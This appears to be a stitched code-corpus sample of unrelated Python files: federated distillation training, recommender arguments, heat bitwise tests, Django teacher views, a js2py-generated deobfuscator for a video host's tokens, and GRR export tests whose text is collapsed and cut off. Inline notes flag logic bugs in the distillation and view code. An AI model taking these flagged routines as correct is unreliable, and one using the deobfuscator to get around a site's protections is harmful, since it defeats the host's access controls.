        train_accs, train_losses = [], []
        for i in range(self.local_epochs_ensemble):
            for x, y in self.train_loaders[client_nr]:
                x, y = x.to(self.device), y.to(self.device)
                optimizer.zero_grad()
                output = self.local_model(x)
                error = self.loss_function(output, y)
                error.backward()
                optimizer.step()
            train_acc, train_loss = self.evaluate(self.local_model, self.train_loaders[client_nr])
            train_accs.append(train_acc)
            train_losses.append(train_loss)
            print("Epoch {}/{} Train accuracy: {:.0f}%  Train loss: {:.4f}".format(
                i+1, self.local_epochs_ensemble, train_acc, train_loss), end="\r", flush=True)
        print("Training completed")
        print("Train accuracy: {:.0f}%  Train loss: {:.4f}\n".format(train_acc, train_loss), flush=True)
        return train_accs, train_losses

    def _train_student(self, student_model, ensemble_logits, student_loader,
                       public_train_loader, public_val_loader, public_size):
        """ Distill a student model from the weighted ensemble logits.

        Returns:
        (list, list, list, list): per-epoch train/val accuracies and losses.
        """
        model = create_model(student_model).to(self.device)
        loss_function = nn.MSELoss() if self.student_loss == "mse" else nn.CrossEntropyLoss()
        optimizer = optim.Adam(model.parameters(), lr=self.student_lr)
        train_accs, train_losses, val_accs, val_losses = [], [], [], []
        for epoch in range(self.student_epochs):
            model.train()
            for x, idx in student_loader:
                x = x.to(self.device)
                idx = idx.to(self.device)
                # Sample a random subset of clients for this batch.
                active_clients = np.random.choice(np.arange(self.n_clients), int(self.client_sample_fraction * self.n_clients), replace=False)
                merged_logits = torch.zeros(self.student_batch_size, self.n_classes, device=self.device)
                for c in active_clients:
                    if len(idx) != self.student_batch_size:
                        # Last (short) batch: pad the logits up to the full
                        # batch size.
                        # NOTE(review): this writes into a single class
                        # column (n_classes-1) — looks like it should be
                        # `selected_logits[:len(idx), :]`; confirm shapes.
                        selected_logits = torch.zeros(self.student_batch_size, self.n_classes, device=self.device)
                        selected_logits[:len(idx), self.n_classes-1] = ensemble_logits[c][idx]
                    else:
                        selected_logits = ensemble_logits[c][idx]
                    merged_logits += selected_logits * self._ensemble_weight(client_nr=c, active_clients=active_clients, sample_indices=idx)
                if self.student_loss == "ce":
                    # Cross-entropy targets are hard labels (argmax).
                    _, merged_logits = torch.max(merged_logits, 1)
                elif self.weight_scheme == 2:
                    # Re-normalize rows so they remain a distribution.
                    merged_logits = (merged_logits.T / torch.sum(merged_logits, 1)).T
                optimizer.zero_grad()
                output = model(x)
                loss = loss_function(output, merged_logits)
                loss.backward()
                optimizer.step()
            train_acc, train_loss = self.evaluate(model, public_train_loader)
            val_acc, val_loss = self.evaluate(model, public_val_loader)
            train_accs.append(train_acc)
            train_losses.append(train_loss)
            val_accs.append(val_acc)
            val_losses.append(val_loss)
            print("Epoch {}/{} Train accuracy: {:.0f}%  Train loss: {:.4f}  Val accuracy: {:.0f}%  Val loss: {:.4f}".format(
                epoch+1, self.student_epochs, train_acc, train_loss, val_acc, val_loss), end="\r", flush=True)
        self.global_model = model
        return train_accs, train_losses, val_accs, val_losses

    def _get_autoencoder_weights(self, client_nr):
        """ Train a client-local autoencoder and derive per-sample weights
        from reconstruction error on the public and test sets (scheme 2).

        Returns:
        (torch.Tensor, torch.Tensor): public and test sample weights.
        """
        autoencoder = create_model(self.dataset_name + "_autoencoder").to(self.device)
        optimizer = torch.optim.Adam(autoencoder.parameters(), lr=0.001, weight_decay=1e-05)
        loss_fn = nn.MSELoss()
        print("Training autoencoder")
        for epoch in range(self.autoencoder_epochs):
            autoencoder.train()
            train_loss = []
            for img_batch, _ in self.train_loaders[client_nr]:
                img_batch = img_batch.to(self.device)
                output = autoencoder(img_batch)
                loss = loss_fn(output, img_batch)
                optimizer.zero_grad()
                loss.backward()
                optimizer.step()
                train_loss.append(loss.detach().cpu().numpy())
            train_loss = np.mean(train_loss)
            print('Epoch {}/{} \t train loss {}'.format(epoch + 1, self.autoencoder_epochs, train_loss), end="\r")
        print("\n\n")
        autoencoder.eval()
        public_samples_loss = []
        with torch.no_grad():
            for img_batch, _ in self.public_loader:
                img_batch = img_batch.to(self.device)
                output = autoencoder(img_batch)
                sample_loss = []
                for j in range(len(img_batch)):
                    sample_loss.append(torch.mean((output[j]-img_batch[j])*(output[j]-img_batch[j])))
                public_samples_loss.extend(sample_loss)
        test_samples_loss = []
        with torch.no_grad():
            for img_batch, _ in self.test_loader:
                img_batch = img_batch.to(self.device)
                output = autoencoder(img_batch)
                sample_loss = []
                for j in range(len(img_batch)):
                    sample_loss.append(torch.mean((output[j]-img_batch[j])*(output[j]-img_batch[j])))
                test_samples_loss.extend(sample_loss)
        # Lower reconstruction error -> (much) larger weight; the 6th power
        # sharpens the contrast between in- and out-of-distribution samples.
        ae_public_weights = torch.tensor([1/sample_loss**6 for sample_loss in public_samples_loss], device=self.device)
        ae_test_weights = torch.tensor([1/sample_loss**6 for sample_loss in test_samples_loss], device=self.device)
        return ae_public_weights, ae_test_weights

    def _get_student_data_loaders(self, data_size, ensemble_logits):
        """ Build loaders over the public dataset: a student loader and an
        80/20 train/validation split labelled with ensemble pseudo-targets.
        """
        merged_logits = torch.zeros(ensemble_logits[0].shape, device=self.device)
        for c in range(self.n_clients):
            merged_logits += ensemble_logits[c] * self._ensemble_weight(client_nr=c, active_clients=np.arange(self.n_clients))
        _, targets = torch.max(merged_logits, 1)
        train_size = int(0.8 * data_size)
        train_indices, val_indices = np.arange(train_size), np.arange(train_size, data_size)
        public_train_data = copy.deepcopy(self.public_loader.dataset)
        public_train_data.dataset.targets = targets.to('cpu')
        public_val_data = copy.deepcopy(public_train_data)
        public_train_data.indices, public_val_data.indices = train_indices, val_indices
        student_data = copy.deepcopy(self.public_loader.dataset)
        student_data.indices = train_indices
        public_train_loader = DataLoader(public_train_data, batch_size=self.public_batch_size, num_workers=self.num_workers)
        public_val_loader = DataLoader(public_val_data, batch_size=self.public_batch_size, num_workers=self.num_workers)
        student_loader = DataLoader(StudentData(student_data), self.student_batch_size, shuffle=True, num_workers=self.num_workers)
        return student_loader, public_train_loader, public_val_loader

    def _ensemble_weight(self, client_nr, active_clients, sample_indices=None, test=False):
        """ Weight client contributions.

        Parameters:
        client_nr (int): ID for client.
        active_clients: iterable of client IDs participating in the merge.
        sample_indices: optional per-sample indices (scheme 2 only).
        test (bool): use test-set weights instead of public-set (scheme 2).
        """
        if self.weight_scheme == 0:
            # Weight by relative local dataset size.
            return self.n_samples_client[client_nr] / sum([self.n_samples_client[c] for c in active_clients])
        elif self.weight_scheme == 1:
            # Weight per class by relative label counts.
            return torch.true_divide(self.label_count_matrix[client_nr], torch.sum(self.label_count_matrix[active_clients], axis=0)+0.001)
        elif self.weight_scheme == 2:
            # Weight per sample by autoencoder reconstruction confidence.
            weights = self.ae_test_weights if test else self.ae_public_weights
            if sample_indices is None:
                return weights[client_nr][:, None]
            else:
                return weights[client_nr][sample_indices, None]
        else:
            print("Chosen weight scheme is not implemented.")
            # BUGFIX: was sys.exit(0), which reported success on a fatal
            # configuration error; exit non-zero instead.
            sys.exit(1)

    def _get_local_logits(self):
        """ Compute the current local model's softmax outputs on the public
        and test sets.

        Returns:
        (torch.Tensor, torch.Tensor): public and test softmax logits.
        """
        self.local_model.eval()
        public_logits = None
        with torch.no_grad():
            for x, _ in self.public_loader:
                x = x.to(self.device)
                if public_logits is None:
                    public_logits = F.softmax(self.local_model(x), dim=1)
                else:
                    public_logits = torch.cat((public_logits, F.softmax(self.local_model(x), dim=1)))
        test_logits = None
        with torch.no_grad():
            for x, _ in self.test_loader:
                x = x.to(self.device)
                if test_logits is None:
                    test_logits = F.softmax(self.local_model(x), dim=1)
                else:
                    test_logits = torch.cat((test_logits, F.softmax(self.local_model(x), dim=1)))
        return public_logits.to(self.device), test_logits.to(self.device)

    def _get_student_targets(self, ensemble_output, public_size):
        """ Scatter ensemble outputs back onto public-dataset indices. """
        targets = torch.zeros(ensemble_output.shape)
        for i in range(public_size):
            idx_public = self.public_loader.dataset.indices[i]
            targets[idx_public] = ensemble_output[i]
        return targets

    def _ensemble_accuracy(self, ensemble_logits):
        """ Accuracy of the weighted ensemble prediction on the test set. """
        merged_logits = torch.zeros(ensemble_logits[0].shape, device=self.device)
        for c in range(self.n_clients):
            merged_logits += ensemble_logits[c] * self._ensemble_weight(client_nr=c, active_clients=np.arange(self.n_clients), test=True)
        targets = self.test_loader.dataset.targets.to(self.device)
        _, preds = torch.max(merged_logits, 1)
        correct = (preds == targets).sum().item()
        return 100. * correct / len(self.test_loader.dataset)
import argparse


def parse_args():
    """Build and parse the command-line arguments for the recommender.

    Returns:
        argparse.Namespace: parsed arguments with typed values.
    """
    parser = argparse.ArgumentParser(description='test recommender')
    # common settings
    # python main.py --algo_name mf --dataset ml-100k --epochs 10 --gce
    parser.add_argument('--seed',
                        type=int,
                        default=1234,
                        # BUGFIX: help said 'tuning epochs' (copy-paste from
                        # --tune_epochs)
                        help='random seed')
    parser.add_argument('--printall',
                        action="store_true",
                        default=False,
                        help='activate saving all training results in csv')
    parser.add_argument('--tune_epochs',
                        type=int,
                        default=100,
                        help='tuning epochs')
    parser.add_argument('--remove_top_users',
                        type=int,
                        default=0,
                        help='% of top users to remove')
    parser.add_argument('--remove_on',
                        type=str,
                        default='item',
                        help='apply remove top_users on item/user')
    parser.add_argument('--gcetype',
                        type=str,
                        default='gce',
                        help='choose in [gce, gat, sgc, sage, cluster]')
    parser.add_argument("--logs",
                        action="store_false",
                        default=True,
                        help="Enables logs")
    parser.add_argument("--rankall",
                        action="store_true",
                        default=False,
                        help="Enables rank between all items")
    parser.add_argument("--statistics",
                        action="store_true",
                        default=False,
                        help="Enables statistics dataset")
    parser.add_argument("--context_as_userfeat",
                        action="store_true",
                        default=False,
                        help="Enables using context as user multihot features")
    parser.add_argument("--save_initial_weights",
                        action="store_true",
                        default=False,
                        help="Enables saving epoch 0 weights.")
    parser.add_argument("--load_init_weights",
                        action="store_true",
                        default=False,
                        help="Enables loading init weights")
    parser.add_argument("--not_early_stopping",
                        action="store_true",
                        default=False,
                        help="Enables not doing early stopping")
    parser.add_argument("--logsname",
                        default="",
                        help="Enables logs")
    parser.add_argument('--reindex',
                        action='store_false',
                        default=True,
                        help='activate if do not want to reindex items')
    parser.add_argument('--uii',
                        action='store_true',
                        default=False,
                        help='activate if you want to add context with same embebddings')
    parser.add_argument('--random_context',
                        action='store_true',
                        default=False,
                        help='activate if you want to do experiment with random last clicked item as context')
    parser.add_argument('--neg_sampling_each_epoch',
                        action='store_true',
                        default=False,
                        help='activate if we want to perform neg_sampling in each epoch')
    parser.add_argument('--context',
                        action='store_false',
                        default=True,
                        help='activate if do not want to add context')
    parser.add_argument('--context_type',
                        type=str,
                        default='cost',
                        help='type context frappe')
    parser.add_argument('--gce',
                        action='store_true',
                        default=False,
                        help='activate to use GCE layer instead of current embbedding layer')
    parser.add_argument('--side_information',
                        action='store_true',
                        default=False,
                        help='activate to use side_information features')
    parser.add_argument('--actors',
                        action='store_true',
                        default=False,
                        help='activate to use ACTORS appended to side_information features')
    parser.add_argument('--cut_down_data',
                        action='store_true',
                        default=False,
                        help='activate to use half interactions per user --> reduce dataset size')
    parser.add_argument('--mf',
                        action='store_true',
                        default=False,
                        help='activate to use MF in NFM ')
    parser.add_argument('--mh',
                        type=int,
                        default=1,
                        help='HOPS TO ENABLE -- MULTI HOP FUNCTION')
    parser.add_argument('--problem_type',
                        type=str,
                        default='pair',
                        help='pair-wise or point-wise')
    parser.add_argument('--algo_name',
                        type=str,
                        default='fm',
                        help='algorithm to choose')
    parser.add_argument('--dataset',
                        type=str,
                        default='ml-100k',
                        help='select dataset')
    parser.add_argument('--prepro',
                        type=str,
                        default='origin',
                        help='dataset preprocess op.: origin/Ncore/filter')
    parser.add_argument('--topk',
                        type=int,
                        default=21,
                        help='top number of recommend list')
    parser.add_argument('--test_method',
                        type=str,
                        default='tloo',
                        help='method for split test,options: ufo/loo/fo(split by ratio)/tfo/tloo')
    parser.add_argument('--val_method',
                        type=str,
                        default='tloo',
                        help='validation method, options: cv, tfo, loo, tloo')
    parser.add_argument('--test_size',
                        type=float,
                        default=0.2,
                        help='split ratio for test set')
    parser.add_argument('--val_size',
                        type=float,
                        default=0.1,
                        help='split ratio for validation set')
    parser.add_argument('--fold_num',
                        type=int,
                        default=5,
                        help='No. of folds for cross-validation')
    parser.add_argument('--cand_num',
                        type=int,
                        default=99,
                        help='No. of candidates item for predict')
    parser.add_argument('--sample_method',
                        type=str,
                        default='uniform',
                        help='negative sampling method mixed with uniform, options: item-ascd, item-desc')
    parser.add_argument('--sample_ratio',
                        type=float,
                        default=1,
                        help='mix sample method ratio, 0 for all uniform')
    parser.add_argument('--init_method',
                        type=str,
                        default='',
                        help='weight initialization method')
    parser.add_argument('--gpu',
                        type=str,
                        default='0',
                        help='gpu card ID')
    parser.add_argument('--num_ng',
                        type=int,
                        default=4,
                        help='negative sampling number')
    parser.add_argument('--loss_type',
                        type=str,
                        default='BPR',
                        help='loss function type: BPR/CL')
    parser.add_argument('--optimizer',
                        type=str,
                        default='adam',
                        help='type of optimizer: SGD /adam')
    # algo settings
    parser.add_argument('--factors',
                        type=int,
                        default=64,
                        help='latent factors numbers in the model')
    parser.add_argument('--reg_1',
                        type=float,
                        default=0,
                        help='L1 regularization')
    parser.add_argument('--reg_2',
                        type=float,
                        default=0.01,
                        help='L2 regularization')
    # BUGFIX: --dropout/--lr/--batch_size had no type=, so values passed on
    # the command line stayed strings and broke numeric use downstream.
    parser.add_argument('--dropout',
                        type=float,
                        default=0.5,
                        help='dropout rate')
    parser.add_argument('--lr',
                        type=float,
                        default=0.005,
                        help='learning rate')
    parser.add_argument('--epochs',
                        type=int,
                        default=50,
                        help='training epochs')
    parser.add_argument("--num_workers",
                        type=int,
                        default=16,
                        help='num_workers')
    parser.add_argument('--batch_size',
                        type=int,
                        default=512,
                        help='batch size for training')
    parser.add_argument('--num_layers',
                        type=int,
                        default=1,
                        help='number of layers in MLP model')
    parser.add_argument('--max_evals',
                        type=int,
                        default=10,
                        help='number of trials TUNE')
    parser.add_argument('--num_heads',
                        type=int,
                        default=1,
                        help='number of multi-head attention GAT')
    parser.add_argument('--act_func',
                        type=str,
                        default='relu',
                        help='activation method in interio layers')
    parser.add_argument('--out_func',
                        type=str,
                        default='sigmoid',
                        help='activation method in output layers')
    parser.add_argument('--no_batch_norm',
                        action='store_false',
                        default=True,
                        help='whether do batch normalization in interior layers')
    args = parser.parse_args()
    return args
import unittest
import torch
import os

import heat as ht
from .test_suites.basic_test import TestCase


class TestOperations(TestCase):
    """Broadcasting tests for heat's binary bitwise operators (&, |, ^)
    across the possible split configurations of the two operands."""

    def test___binary_bit_op_broadcast(self):
        # broadcast without split
        left_tensor = ht.ones((4, 1), dtype=ht.int32)
        right_tensor = ht.ones((1, 2), dtype=ht.int32)
        result = left_tensor & right_tensor
        self.assertEqual(result.shape, (4, 2))
        result = right_tensor & left_tensor
        self.assertEqual(result.shape, (4, 2))

        # broadcast with split=0 for both operants
        left_tensor = ht.ones((4, 1), split=0, dtype=ht.int32)
        right_tensor = ht.ones((1, 2), split=0, dtype=ht.int32)
        result = left_tensor | right_tensor
        self.assertEqual(result.shape, (4, 2))
        result = right_tensor | left_tensor
        self.assertEqual(result.shape, (4, 2))

        # broadcast with split=1 for both operants
        left_tensor = ht.ones((4, 1), split=1, dtype=ht.int32)
        right_tensor = ht.ones((1, 2), split=1, dtype=ht.int32)
        result = left_tensor ^ right_tensor
        self.assertEqual(result.shape, (4, 2))
        result = right_tensor ^ left_tensor
        self.assertEqual(result.shape, (4, 2))

        # broadcast with split=1 for second operant
        left_tensor = ht.ones((4, 1), dtype=ht.int32)
        right_tensor = ht.ones((1, 2), split=1, dtype=ht.int32)
        result = left_tensor & right_tensor
        self.assertEqual(result.shape, (4, 2))
        result = right_tensor & left_tensor
        self.assertEqual(result.shape, (4, 2))

        # broadcast with split=0 for first operant
        left_tensor = ht.ones((4, 1), split=0, dtype=ht.int32)
        right_tensor = ht.ones((1, 2), dtype=ht.int32)
        result = left_tensor | right_tensor
        self.assertEqual(result.shape, (4, 2))
        result = right_tensor | left_tensor
        self.assertEqual(result.shape, (4, 2))

        # broadcast with unequal dimensions and one splitted tensor
        left_tensor = ht.ones((2, 4, 1), split=0, dtype=ht.int32)
        right_tensor = ht.ones((1, 2), dtype=ht.int32)
        result = left_tensor ^ right_tensor
        self.assertEqual(result.shape, (2, 4, 2))
        result = right_tensor ^ left_tensor
        self.assertEqual(result.shape, (2, 4, 2))

        # broadcast with unequal dimensions, a scalar, and one splitted tensor
        # NOTE(review): `ht.np` presumably re-exports numpy from heat —
        # verify; `ht.int32(1)` or a plain Python int may be intended.
        left_scalar = ht.np.int32(1)
        right_tensor = ht.ones((1, 2), split=0, dtype=ht.int32)
        result = ht.bitwise_or(left_scalar, right_tensor)
        self.assertEqual(result.shape, (1, 2))
        result = right_tensor | left_scalar
        self.assertEqual(result.shape, (1, 2))

        # broadcast with unequal dimensions and two splitted tensors
        left_tensor = ht.ones((4, 1, 3, 1, 2), split=0, dtype=torch.uint8)
        right_tensor = ht.ones((1, 3, 1), split=0, dtype=torch.uint8)
        result = left_tensor & right_tensor
        self.assertEqual(result.shape, (4, 1, 3, 3, 2))
        result = right_tensor & left_tensor
        self.assertEqual(result.shape, (4, 1, 3, 3, 2))

        # bitwise ops reject non-tensor operands ...
        with self.assertRaises(TypeError):
            ht.bitwise_and(ht.ones((1, 2)), "wrong type")

        # ... and mixed split axes are not (yet) supported
        with self.assertRaises(NotImplementedError):
            ht.bitwise_or(
                ht.ones((1, 2), dtype=ht.int32, split=0), ht.ones((1, 2), dtype=ht.int32, split=1)
            )
# <filename>day_ok/schedule/views/teachers.py
from typing import Dict, Any
from django.shortcuts import render, redirect, Http404
from django.http import HttpRequest
from django.forms.models import model_to_dict
from ..middleware import authenticated
from ..forms.teachers import (
    TeacherLessonsColorForm,
    TeacherForm,
)
from ..bl.teachers import (
    teachers_objects,
    get_teacher,
    get_teacher_lessons_info,
    set_teacher_lessons_color,
    add_teacher,
    edit_teacher,
    prepare_date_fields,
    delete_teacher,
    unpin_teacher_subject,
    get_lessons_by_year_and_month,
    get_weekly_lessons_by_year_and_month,
)
from ..utils import (
    is_valid_period_format,
    create_datetime_start_from_period,
    create_datetime_end_period,
    get_year_month_periods,
    get_period,
    datetime_now_tz,
    create_datetime_start_period,
)


@authenticated
def teachers(request: HttpRequest, *args, **kwargs):
    """List all teachers; on POST, create a new teacher from TeacherForm."""
    context: Dict[Any, Any] = {}

    def _view():
        # Populate the listing and an empty creation form.
        context.update(teachers=teachers_objects())
        context.update(form=TeacherForm())

    def _add():
        form = TeacherForm(request.POST)
        if form.is_valid():
            add_teacher(**form.cleaned_data)
        else:
            context.update(errors=form.errors)

    if request.method == 'POST':
        _add()

    # Always re-render the listing (also after a POST).
    _view()
    return render(request, 'schedule/teachers/base.html', context)


@authenticated
def teachers_view(request: HttpRequest, teacher_id: int):
    """Teacher detail page: lessons report/calendar plus an edit form."""
    dt_now = datetime_now_tz()
    dt_start_period = create_datetime_start_period(dt_now)
    dt_end_period = create_datetime_end_period(dt_start_period)
    default_period = get_period(dt_now.year, dt_now.month)
    ctx: Dict[Any, Any] = {
        'periods': get_year_month_periods(),
        'selected_period': default_period,
    }
    template_name = 'schedule/teachers/view.html'

    def _edit():
        form = TeacherForm(request.POST)
        if form.is_valid():
            if not get_teacher(teacher_id):
                raise Http404("Викладач не існує")
            _teacher = edit_teacher(
                teacher_id,
                **form.cleaned_data,
            )
        # Refresh the context with the (possibly updated) teacher data.
        _view()

    def _view():
        # Resolve the requested reporting period, falling back to the
        # current month.
        period = request.GET.get('period')
        dt_start, dt_end = None, None
        if period and is_valid_period_format(period):
            dt_start = create_datetime_start_from_period(period)
            dt_end = create_datetime_end_period(dt_start)
            ctx.update(selected_period=period)

        ctx.update(
            lessons_reports=get_teacher_lessons_info(
                teacher_id,
                dt_start or dt_start_period,
                dt_end or dt_end_period
            )
        )

        teacher = get_teacher(teacher_id)
        if not teacher:
            raise Http404("Викладач не існує")
        year = (dt_start or dt_start_period).year
        month = (dt_start or dt_start_period).month
        ctx.update(lessons_calendar=list(get_weekly_lessons_by_year_and_month(
            teacher, year, month,
        )))
        data = model_to_dict(teacher)
        prepare_date_fields(data)
        ctx.update(teacher=teacher)
        ctx.update(form=TeacherForm(data=data))
        # NOTE(review): no return statement — _view() always yields None.

    if request.method == 'POST':
        _edit()
    elif request.method == 'GET':
        # NOTE(review): _view() never returns a truthy value, so every GET
        # takes the else-branch and redirects to the listing; the render()
        # below is unreachable for GET. Probably the else-branch should be
        # removed (fall through to render) — confirm intended behavior.
        if res := _view():
            return res
        else:
            return redirect('teachers')

    return render(request, template_name, ctx)


@authenticated
def set_teacher_lessons_style(request: HttpRequest, teacher_id: int):
    """Update the color used to render this teacher's lessons."""
    if request.method == 'POST':
        form = TeacherLessonsColorForm(request.POST)
        if form.is_valid():
            _teacher = set_teacher_lessons_color(
                teacher_id,
                **form.cleaned_data,
            )
    # NOTE(review): non-POST requests fall through and return None
    # (no HttpResponse) — confirm only POST is routed here.
    return redirect('teachers_actions', teacher_id)


@authenticated
def teacher_delete(request: HttpRequest, teacher_id: int):
    """Delete a teacher and return to the listing."""
    if request.method == 'POST':
        delete_teacher(teacher_id)
    return redirect('teachers')


@authenticated
def unpin_subject(request: HttpRequest, teacher_id: int):
    """Detach a subject from a teacher (subject_id comes from POST data)."""
    if request.method == 'POST':
        unpin_teacher_subject(
            teacher_id,
            request.POST.get('subject_id', -1),
        )
    return redirect('teachers_actions', teacher_id)
# <filename>anime_downloader/extractors/kwik_token_extractor.py
# NOTE: this module is machine-generated by js2py from obfuscated
# JavaScript served by the kwik video host. Do not hand-edit the
# translated bodies; regenerate them from the source JS instead.
from js2py.pyjs import *
# setting scope
var = Scope(JS_BUILTINS)
set_global_object(var)

# Code follows:
var.registers(['extract_data', '_0xe12c'])


# JS function `_0xe12c(d, e, f)`: converts the string `d` from base `e`
# to base `f` using a shared base-64 alphabet (a custom radix converter
# used by the obfuscator).
@Js
def PyJsHoisted__0xe12c_(d, e, f, this, arguments, var=var):
    var = Scope({'d': d, 'e': e, 'f': f, 'this': this, 'arguments': arguments}, var)
    var.registers(['e', 'i', 'h', 'g', 'k', 'd', 'j', 'f'])
    var.put('g', Js('0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/').callprop('split', Js('')))
    var.put('h', var.get('g').callprop('slice', Js(0.0), var.get('e')))
    var.put('i', var.get('g').callprop('slice', Js(0.0), var.get('f')))

    # reduce() callback: accumulate the base-`e` value of `d` digit by digit.
    @Js
    def PyJs_anonymous_0_(a, b, c, this, arguments, var=var):
        var = Scope({'a': a, 'b': b, 'c': c, 'this': this, 'arguments': arguments}, var)
        var.registers(['b', 'c', 'a'])
        if PyJsStrictNeq(var.get('h').callprop('indexOf', var.get('b')), (-Js(1.0))):
            return var.put('a', (var.get('h').callprop('indexOf', var.get('b')) * var.get('Math').callprop('pow', var.get('e'), var.get('c'))), '+')
    PyJs_anonymous_0_._set_name('anonymous')
    var.put('j', var.get('d').callprop('split', Js('')).callprop('reverse').callprop('reduce', PyJs_anonymous_0_, Js(0.0)))
    var.put('k', Js(''))
    # Emit digits of `j` in base `f`, most significant first.
    while (var.get('j') > Js(0.0)):
        var.put('k', (var.get('i').get((var.get('j') % var.get('f'))) + var.get('k')))
        var.put('j', ((var.get('j') - (var.get('j') % var.get('f'))) / var.get('f')))
    return (var.get('k') or Js('0'))


PyJsHoisted__0xe12c_.func_name = '_0xe12c'
var.put('_0xe12c', PyJsHoisted__0xe12c_)


# JS function `extract_data(h, u, n, t, e, r)`: decodes the obfuscated
# payload `h` by splitting it on the sentinel character `n[e]`, mapping
# the alphabet `n` back to digits, converting each chunk from base `e`
# via _0xe12c and subtracting the offset `t` to recover each char code.
@Js
def PyJsHoisted_extract_data_(h, u, n, t, e, r, this, arguments, var=var):
    var = Scope({'h': h, 'u': u, 'n': n, 't': t, 'e': e, 'r': r, 'this': this, 'arguments': arguments}, var)
    var.registers(['e', 'len', 'i', 'h', 'u', 'n', 'r', 's', 't', 'j'])
    var.put('r', Js(''))
    # for JS loop
    var.put('i', Js(0.0))
    var.put('len', var.get('h').get('length'))
    while (var.get('i') < var.get('len')):
        try:
            # Collect characters up to the next sentinel `n[e]`.
            var.put('s', Js(''))
            while PyJsStrictNeq(var.get('h').get(var.get('i')), var.get('n').get(var.get('e'))):
                var.put('s', var.get('h').get(var.get('i')), '+')
                (var.put('i', Js(var.get('i').to_number()) + Js(1)) - Js(1))
            # for JS loop
            # Replace each alphabet character with its digit index.
            var.put('j', Js(0.0))
            while (var.get('j') < var.get('n').get('length')):
                try:
                    var.put('s', var.get('s').callprop('replace', var.get('RegExp').create(var.get('n').get(var.get('j')), Js('g')), var.get('j')))
                finally:
                    (var.put('j', Js(var.get('j').to_number()) + Js(1)) - Js(1))
            var.put('r', var.get('String').callprop('fromCharCode', (var.get('_0xe12c')(var.get('s'), var.get('e'), Js(10.0)) - var.get('t'))), '+')
        finally:
            (var.put('i', Js(var.get('i').to_number()) + Js(1)) - Js(1))
    return var.get('decodeURIComponent')(var.get('escape')(var.get('r')))


PyJsHoisted_extract_data_.func_name = 'extract_data'
var.put('extract_data', PyJsHoisted_extract_data_)

# Expose the JS scope (including extract_data) to Python callers.
kwik_token_extractor = var.to_python()
<reponame>raydan4/grr # Lint as: python3 # -*- encoding: utf-8 -*- """Tests for JSON instant output plugin.""" import os import zipfile from absl import app import json from grr_response_core.lib.rdfvalues import client as rdf_client from grr_response_core.lib.rdfvalues import client_fs as rdf_client_fs from grr_response_core.lib.rdfvalues import paths as rdf_paths from grr_response_server.output_plugins import test_plugins from grr_response_server.output_plugins import json_plugin from grr.test_lib import test_lib class JsonInstantOutputPluginTest(test_plugins.InstantOutputPluginTestBase): """Tests the JSON instant output plugin.""" plugin_cls = json_plugin.JsonInstantOutputPluginWithExportConversion def ProcessValuesToZip(self, values_by_cls): fd_path = self.ProcessValues(values_by_cls) file_basename, _ = os.path.splitext(os.path.basename(fd_path)) return zipfile.ZipFile(fd_path), file_basename def testJsonPluginWithValuesOfSametypes(self): responses = [] for i in range(10): responses.append( rdf_client_fs.StatEntry( pathspec=rdf_paths.PathSpec( path="/foo/bar/%d" % i, pathtype="OS"), st_mode=33184, st_ino=1063090, st_dev=64512, st_nlink=1 + i, st_uid=139592, st_gid=5000, st_size=0, st_atime=1336469177, st_mtime=1336129892, st_ctime=1336129892)) zip_fd, prefix = self.ProcessValuesToZip( {rdf_client_fs.StatEntry: responses}) self.assertEqual( set(zip_fd.namelist()), { "%s/MANIFEST" % prefix, "%s/ExportedFile/from_StatEntry.json" % prefix }) parsed_manifest = json.loads(zip_fd.read("%s/MANIFEST" % prefix)) self.assertEqual(parsed_manifest, {"export_stats": { "StatEntry": { "ExportedFile": 10 }}}) parsed_output = json.loads( zip_fd.read("%s/ExportedFile/from_StatEntry.json" % prefix)) self.assertLen(parsed_output, 10) for i in range(10): self.assertEqual(parsed_output[i]["metadata"]["client_urn"], "aff4:/%s" % self.client_id) self.assertEqual(parsed_output[i]["metadata"]["source_urn"], str(self.results_urn)) self.assertEqual(parsed_output[i]["urn"], 
"aff4:/%s/fs/os/foo/bar/%d" % (self.client_id, i)) self.assertEqual(parsed_output[i]["st_mode"], "-rw-r-----") self.assertEqual(parsed_output[i]["st_ino"], "1063090") self.assertEqual(parsed_output[i]["st_dev"], "64512") self.assertEqual(parsed_output[i]["st_nlink"], str(1 + i)) self.assertEqual(parsed_output[i]["st_uid"], "139592") self.assertEqual(parsed_output[i]["st_gid"], "5000") self.assertEqual(parsed_output[i]["st_size"], "0") self.assertEqual(parsed_output[i]["st_atime"], "2012-05-08 09:26:17") self.assertEqual(parsed_output[i]["st_mtime"], "2012-05-04 11:11:32") self.assertEqual(parsed_output[i]["st_ctime"], "2012-05-04 11:11:32") self.assertEqual(parsed_output[i]["st_blksize"], "0") self.assertEqual(parsed_output[i]["st_rdev"], "0") self.assertEqual(parsed_output[i]["symlink"], "") def testJsonPluginWithValuesOfMultipleTypes(self): zip_fd, prefix = self.ProcessValuesToZip({ rdf_client_fs.StatEntry: [ rdf_client_fs.StatEntry( pathspec=rdf_paths.PathSpec(path="/foo/bar", pathtype="OS")) ], rdf_client.Process: [rdf_client.Process(pid=42)] }) self.assertEqual( set(zip_fd.namelist()), { "%s/MANIFEST" % prefix, "%s/ExportedFile/from_StatEntry.json" % prefix, "%s/ExportedProcess/from_Process.json" % prefix }) parsed_manifest = json.loads(zip_fd.read("%s/MANIFEST" % prefix)) self.assertEqual( parsed_manifest, { "export_stats": { "StatEntry": { "ExportedFile": 1 }, "Process": { "ExportedProcess": 1 } } }) parsed_output = json.loads( zip_fd.read("%s/ExportedFile/from_StatEntry.json" % prefix)) self.assertLen(parsed_output, 1) self.assertEqual(parsed_output[0]["metadata"]["client_urn"], "aff4:/%s" % self.client_id) self.assertEqual(parsed_output[0]["metadata"]["source_urn"], str(self.results_urn)) self.assertEqual(parsed_output[0]["urn"], "aff4:/%s/fs/os/foo/bar" % self.client_id) parsed_output = json.loads( zip_fd.read("%s/ExportedProcess/from_Process.json" % prefix)) self.assertLen(parsed_output, 1) self.assertEqual(parsed_output[0]["pid"], "42") def 
